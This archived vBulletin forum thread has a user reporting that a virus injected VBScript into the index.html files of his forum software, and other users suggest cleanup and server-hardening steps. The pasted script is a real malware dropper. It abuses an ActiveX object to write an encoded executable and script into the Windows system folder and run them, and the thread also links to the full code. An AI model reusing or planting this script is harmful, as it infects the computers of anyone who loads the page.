vb.org Archive


Mean 07-30-2007 05:55 PM

Omg, Virus code in Vbulletin files.
 
Last week, my computer was infected by the kernel.exe virus.
I removed that, but now I am shocked. It put this code in all index.html pages
in the vBulletin folder on my desktop?

It put this code in

includes/index.html
images/index.html
clientscript/index.html
etc.

Code:

<script language=vbscript>
on error resume next
fileexe1="077090144000003000000000004000000000255255000000184000000000000000000000064000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000184000000000014031186014000180009205033184001076205033084104105115032112114111103114097109032099097110110111116032098101032114117110032105110032068079083032109111100101046013013010036000000000000000000000212036142028144069224079144069224079144069224079030090243079135069224079108101242079147069224079082105099104144069224079"
dim sys
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 "
set fso = df.createobject("Scripting.FileSystemObject","")
set s=df.CreateObject("Shell.Application.1","")
set re=df.createobject("wscript.shell","")
sys=fso.GetSpecialFolder(1)
For a = 1 To Len(filevbs1) Step 3
filevbs2=filevbs2 & chr(mid(filevbs1,a,3))
if a < len(fileexe1)+1 then fileexe2=fileexe2 & chr(mid(fileexe1,a,3))
next
fso.CreateTextFile(sys & "\TSP32E.DLL").write fileexe1
if fso.opentextfile(sys & "\Systeme.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.exe").write fileexe2
s.Open (sys & "\Kernel.exe")
end if
fso.CreateTextFile(sys & "\TSP32V.DLL").write filevbs1
if fso.opentextfile(sys & "\Systemv.dll").readall<>"on" then
fso.CreateTextFile(sys & "\Kernel.vbs").write filevbs2
s.Open (sys & "\Kernel.vbs")
end if
</script>

I think maybe the problem of this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

is from that virus code?

I am very shocked by that...

The full code is this. (I couldn't paste the full code because it is about 24.500 characters)
http://rapidshare.com/files/45994675/kernelcode.html

EnIgMa1234 07-30-2007 06:00 PM

This is not default vB code, as the index.html files are empty. Someone put that there.

Mean 07-30-2007 06:03 PM

Quote:

Originally Posted by EnIgMa1234 (Post 1305568)
This is not default vB code, as the index.html files are empty. Someone put that there.

Yes, of course. But is there any way to get rid of that?

EnIgMa1234 07-30-2007 06:05 PM

Find out who put it there. Have you downloaded any 'dodgy files' lately?

Delete those files also

da420 07-30-2007 06:07 PM

Quote:

Originally Posted by Mean (Post 1305574)
Yes, of course. But is there any way to get rid of that?

Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definitely be looked into.

Mean 07-30-2007 06:16 PM

Quote:

Originally Posted by da420 (Post 1305582)
Replace it with the original file.

Also, if you didn't put that there I would suggest looking at how secure your server is, because no one should be able to add that. Check file permissions, change passwords, server logs, etc. Having someone install a virus on your computer through your website is very bad, and should definitely be looked into.

I removed that virus by reading this
http://www.spywareremove.com/removekernelexe.html

Maybe after

It put the code in the vBulletin folder on my desktop.

When I got this

Parse error: syntax error, unexpected $end, expecting T_STRING or T_VARIABLE or '{' or '$'

error, I uploaded the vBulletin files from my desktop to the web, and I saw that. :(

